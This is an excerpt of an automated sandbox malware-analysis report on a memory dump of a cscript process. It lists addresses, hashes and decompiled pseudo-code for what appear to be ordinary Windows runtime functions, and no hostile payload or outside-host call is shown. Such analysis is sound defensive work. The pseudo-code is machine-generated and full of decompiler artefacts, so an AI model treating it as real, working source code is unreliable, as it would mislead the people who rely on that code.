0x054b918a
0x054b918d
0x054b918f
0x054b9192
0x054b9195
0x054b9198
0x054b9198
0x054b9198
0x054b919a
0x00000000
0x00000000
0x0551371f
0x05513721
0x05513727
0x0551372f
0x05513733
0x05513735
0x05513738
0x0551373b
0x0551373d
0x05513740
0x00000000
0x05513746
0x05513746
0x05513749
0x00000000
0x0551374f
0x0551374f
0x05513751
0x05513757
0x05513759
0x0551375c
0x0551375c
0x0551375e
0x0551375e
0x05513761
0x05513764
0x00000000
0x00000000
0x05513766
0x05513768
0x055137a3
0x055137a3
0x055137a5
0x055137a7
0x055137ad
0x055137b0
0x055137b2
0x055137bc
0x055137c2
0x055137c2
0x055137b2
0x054b9187
0x054b9187
0x054b918a
0x054b918d
0x054b918f
0x054b9192
0x054b9195
0x00000000
0x054b9195
0x00000000
0x0551376a
0x0551376a
0x0551376a
0x0551376c
0x0551376c
0x0551376f
0x05513775
0x00000000
0x00000000
0x05513777
0x05513779
0x05513782
0x05513787
0x05513789
0x05513790
0x05513790
0x0551378b
0x0551378b
0x0551378b
0x05513792
0x05513795
0x00000000
0x05513795
0x00000000
0x05513779
0x05513798
0x00000000
0x05513798
0x00000000
0x05513768
0x0551379b
0x0551379b
0x05513751
0x05513749
0x00000000
0x05513740
0x054b91a0
0x054b91a3
0x054b91a9
0x054b91b0
0x00000000
0x054b91b0
0x054b9187
0x054b91b4
0x054b91b4
0x054b91bb
0x054b91c0
0x054b91c5
0x054b91c7
0x055137da
0x054b91cd
0x054b91cd
0x054b91cd
0x054b91d2
0x054b91d5
0x054b9239
0x054b9239
0x054b91d7
0x054b91db
0x054b91e1
0x054b91e7
0x054b91fd
0x054b9203
0x054b921e
0x054b9223
0x00000000
0x054b9205
0x054b9205
0x054b9208
0x054b920c
0x054b9214
0x054b9214
0x054b920c
0x054b91e9
0x054b91e9
0x054b91ee
0x054b91f3
0x054b91f3
0x054b91f3
0x054b91e7
0x00000000
0x00000000
0x00000000
0x054b9134
0x054b9125
0x054b911d
0x054b914e
0x054b90d1
0x054b90d1
0x054b90d3
0x054b90d6
0x054b90d8
0x00000000
0x054b90d8
0x054b90cf

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 537d3f66c66ab4f08fadd77f13232a5d15bc329a2f9c308901dd200dfd64e507
Instruction ID: bbefe31392baa8080f9278b2b02eeed576b45eccc5ab6f8b1e8c8ef46785cf7b
Opcode Fuzzy Hash: 537d3f66c66ab4f08fadd77f13232a5d15bc329a2f9c308901dd200dfd64e507
Instruction Fuzzy Hash: A901D172A116009FD7248F08D840BA6BBFAFF85320F2540ABF6018B791D6B4DC41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05584015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E05584015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E054D2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E054D2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x55a86ac);
					E054BF900(0x55a86d4, _t28);
					E054CFFB0(0x55a86ac, _t28, 0x55a86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E054CFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x0558401a
0x0558401e
0x05584023
0x05584028
0x05584029
0x0558402b
0x0558402f
0x05584043
0x05584046
0x05584051
0x05584057
0x0558405f
0x05584062
0x05584067
0x0558406f
0x0558407c
0x0558407c
0x0558408c
0x0558408c
0x05584097

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ddd5ad5387abee420647b7a4a41b895221dbc5193350763c92864436730ecfe
Instruction ID: 47837dcbc0c7c13f4927f1849a435d61d95522ecc1b7afdffc3d086253797149
Opcode Fuzzy Hash: 8ddd5ad5387abee420647b7a4a41b895221dbc5193350763c92864436730ecfe
Instruction Fuzzy Hash: 4B017172301945BFD651AB7ACD84E97F7ACFF85650B00022AF50887A11DB64EC11C6F4

Uniqueness

Uniqueness Score: -1.00%

Function 055714FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E055714FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x55ad360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E054FFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E054D7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E054FB640(E054F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x055714fb
0x055714fb
0x0557150a
0x05571514
0x05571519
0x0557151b
0x05571526
0x0557152c
0x05571534
0x05571537
0x0557153a
0x05571545
0x05571557
0x05571547
0x05571550
0x05571550
0x05571562
0x05571563
0x05571565
0x0557156a
0x0557157f

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43109d0bb6d50aee2afc22e62ddc5d7058c9983ac13e37998f56d4c3cc3ea17a
Instruction ID: 5b717b663fa42055738728d05e58c3f39aa2c6184a11be03bccfd86f59c19066
Opcode Fuzzy Hash: 43109d0bb6d50aee2afc22e62ddc5d7058c9983ac13e37998f56d4c3cc3ea17a
Instruction Fuzzy Hash: 89018071A00248ABCB04EF6AD845EAEBBB8EF45700F40405BB905EB280DA70DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0557138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0557138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x55ad360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E054FFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E054D7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E054FB640(E054F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0557138a
0x0557138a
0x05571399
0x055713a3
0x055713a8
0x055713aa
0x055713b5
0x055713bb
0x055713c3
0x055713c6
0x055713c9
0x055713d4
0x055713e6
0x055713d6
0x055713df
0x055713df
0x055713f1
0x055713f2
0x055713f4
0x055713f9
0x0557140e

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbb8b4624bb9514b8ba66466e764558e44694ee3c22f60614a1c808fc4634b23
Instruction ID: c8e091787f1f6ae53fff2cdaadbf2d646b4a8e379f75486a8ba87a5410fc310c
Opcode Fuzzy Hash: dbb8b4624bb9514b8ba66466e764558e44694ee3c22f60614a1c808fc4634b23
Instruction Fuzzy Hash: A3018071E00208ABCB00EFA9D845BAEBBB8EF44700F00405BB900AB280DA709A04CB94

Uniqueness

Uniqueness Score: -1.00%

Function 054B58EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E054B58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x55ad360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x5495c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E054B5943() != 0 &&  *0x55a5320 > 5) {
					E05537B5E( &_v44, _t27);
					_t22 =  &_v28;
					E05537B5E( &_v28, _t28);
					_t11 = E05537B9C(0x55a5320, 0x549bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E054FB640(_t11, _t17, _v8 ^ _t29, 0x549bf15, _t27, _t28);
			}

0x054b58fb
0x054b58fe
0x054b5906
0x054b590a
0x054b593c
0x054b593c
0x054b590c
0x054b590c
0x054b5911
0x00000000
0x054b5913
0x054b5913
0x054b5913
0x054b5911
0x054b591d
0x05511035
0x0551103c
0x0551103f
0x05511056
0x05511056
0x054b593b

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d166722a9ebf5b5e3948fca5262ce06020daf77bd47f3d03a5dfa28d231d685c
Instruction ID: 528eeda95ffde4507b3fd2eca3380b6f907a5104f0aab66546f324a4d61a3052
Opcode Fuzzy Hash: d166722a9ebf5b5e3948fca5262ce06020daf77bd47f3d03a5dfa28d231d685c
Instruction Fuzzy Hash: 9001D471B141049BDB14EF29D8159EFB7B8FF84130B9400ABA90597244FE60DD06CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 0556FE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0556FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x55ad360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E054FFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E054D7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E054FB640(E054F9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0556fe3f
0x0556fe3f
0x0556fe4e
0x0556fe58
0x0556fe5d
0x0556fe5f
0x0556fe6a
0x0556fe72
0x0556fe75
0x0556fe78
0x0556fe83
0x0556fe95
0x0556fe85
0x0556fe8e
0x0556fe8e
0x0556fea0
0x0556fea1
0x0556fea3
0x0556fea8
0x0556febd

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b2c107d6c7c1e2b3d298e53a89626e6848850f4ab0f220dbe0f7cc894c5f496
Instruction ID: 80c3771814ff144b7ec618fb92442b10d87c1e0d823f245f71cf06fd6365f6a7
Opcode Fuzzy Hash: 9b2c107d6c7c1e2b3d298e53a89626e6848850f4ab0f220dbe0f7cc894c5f496
Instruction Fuzzy Hash: 41018471E00248ABDB14EFA9D845FAFBBB8EF44700F00406BF900AB381DA70D911C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 0556FEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0556FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x55ad360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E054FFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E054D7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E054FB640(E054F9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0556fec0
0x0556fec0
0x0556fecf
0x0556fed9
0x0556fede
0x0556fee0
0x0556feeb
0x0556fef3
0x0556fef6
0x0556fef9
0x0556ff04
0x0556ff16
0x0556ff06
0x0556ff0f
0x0556ff0f
0x0556ff21
0x0556ff22
0x0556ff24
0x0556ff29
0x0556ff3e

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12b934a26a1889e5d4002aea396ec55a983635cfcc32fb274eb048dcf2fb38bb
Instruction ID: 2ee990efec12596add5411141e4a3c5b42d05013651ed66aaa35dcc5ef518455
Opcode Fuzzy Hash: 12b934a26a1889e5d4002aea396ec55a983635cfcc32fb274eb048dcf2fb38bb
Instruction Fuzzy Hash: F3018871E00249ABDB14DB69D845FAFB7B8EF45700F40406BB9019B380D9709911CB95

Uniqueness

Uniqueness Score: -1.00%

Function 05581074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05581074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0558165E(__ebx, 0x55a8ae4, (__edx -  *0x55a8b04 >> 0x14) + (__edx -  *0x55a8b04 >> 0x14), __edi, __ecx, (__edx -  *0x55a8b04 >> 0x14) + (__edx -  *0x55a8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0557AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E054D7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0556FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x05581074
0x05581080
0x05581082
0x0558108a
0x0558108f
0x05581093
0x055810ab
0x055810ab
0x055810c3
0x055810cf
0x055810e1
0x055810d1
0x055810da
0x055810da
0x055810e9
0x055810f5
0x055810f5
0x055810fe

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f2d4aa77de4a67a2eaad539dfe2305dab0579fe498b714627de1b363effb605
Instruction ID: 2b47c3be2e6116f56b8676ac657d20fc903996addbbcb69e0ae1e7cef1128fec
Opcode Fuzzy Hash: 4f2d4aa77de4a67a2eaad539dfe2305dab0579fe498b714627de1b363effb605
Instruction Fuzzy Hash: 65014C72608B46DFC710EF29DD44B6A77E5BBC4310F048519F88693690DE30E941CB92

Uniqueness

Uniqueness Score: -1.00%

Function 054CB02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054CB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E054D7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E05537016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x054cb037
0x054cb039
0x054cb03b
0x054cb040
0x0551a60e
0x00000000
0x00000000
0x0551a61d
0x054cb04b
0x054cb04e
0x0551a627
0x0551a634
0x00000000
0x00000000
0x0551a641
0x0551a653
0x0551a643
0x0551a64c
0x0551a64c
0x0551a65b
0x00000000
0x00000000
0x00000000
0x0551a66c
0x054cb057
0x054cb057
0x054cb057
0x054cb046
0x054cb046
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 63c1179a04031ee0b863a8f5497b0c904d8366e07f7b5ede53a0b036710e699a
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: A0018F726059809FE323C75EC988FB67BD9FB86750F0940E6F91ACBA51D728DC40C668

Uniqueness

Uniqueness Score: -1.00%

Function 05588ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E05588ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x55ad360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E054D7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E054FB640(E054F9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x05588ed6
0x05588ee5
0x05588eed
0x05588ef0
0x05588efa
0x05588f03
0x05588f0c
0x05588f15
0x05588f24
0x05588f27
0x05588f31
0x05588f43
0x05588f33
0x05588f3c
0x05588f3c
0x05588f4e
0x05588f4f
0x05588f51
0x05588f56
0x05588f69

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 365606d84094c694b60ea407d5a5c4a051610682882a5aad24dd6847891a837b
Instruction ID: 8f9b10bc96b38790522b749e2f48b74f2418f9a24e91559a8e144be8ec4fbff1
Opcode Fuzzy Hash: 365606d84094c694b60ea407d5a5c4a051610682882a5aad24dd6847891a837b
Instruction Fuzzy Hash: 3B11DE70E042599FDB04EFA9D545BAEFBF4FF08300F5446AAE519EB782E6349940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05588A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E05588A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x55ad360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E054D7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E054FB640(E054F9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x05588a62
0x05588a71
0x05588a79
0x05588a82
0x05588a85
0x05588a89
0x05588a8c
0x05588a8f
0x05588a92
0x05588a95
0x05588a9f
0x05588ab1
0x05588aa1
0x05588aaa
0x05588aaa
0x05588abc
0x05588abd
0x05588abf
0x05588ac4
0x05588ada

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ea2750c954ecc55035433a1a09de9192b0b50b799250c5e362c9df46e64b13b
Instruction ID: 9d2b07d1c27321be31cc63ba9eb34a8faec89ca4e2c4dec51f139fa4b068a464
Opcode Fuzzy Hash: 3ea2750c954ecc55035433a1a09de9192b0b50b799250c5e362c9df46e64b13b
Instruction Fuzzy Hash: 60011E71A002199FDB00EFA9D9459EEB7B8FF49310F54445AF905F7341D634A9008BA0

Uniqueness

Uniqueness Score: -1.00%

Function 054BDB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054BDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E054BDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E054BE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L054BE8B0(__ecx, _t14, 0xfff);
							L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x054bdb64
0x054bdb66
0x054bdb6b
0x054bdbaa
0x054bdb71
0x054bdb76
0x054bdb7a
0x054bdba3
0x054bdb7c
0x054bdb87
0x054bdb8b
0x05514fa1
0x05514fb3
0x05514fb8
0x054bdb91
0x054bdb96
0x054bdb98
0x054bdb98
0x054bdb8b
0x054bdb7a
0x054bdb9d
0x054bdba2

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 5c51928d0b5f66ed07f65e171762f9aab4bc0ec712c2e67f117a2716707b6db3
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: E4F0CD33A095229BF732565544C8FD7B6669FD1750F1500B7B10557344CDE4880346F4

Uniqueness

Uniqueness Score: -1.00%

Function 054BB1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054BB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E054D7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E054D7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E05537016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x054bb1e8
0x054bb1ea
0x054bb1f3
0x05514a17
0x054bb1f9
0x054bb1f9
0x054bb1f9
0x054bb201
0x05514a21
0x05514a2e
0x00000000
0x00000000
0x05514a3b
0x05514a4d
0x05514a3d
0x05514a46
0x05514a46
0x05514a55
0x00000000
0x00000000
0x00000000
0x054bb20a
0x054bb20a
0x054bb20a
0x054bb20a

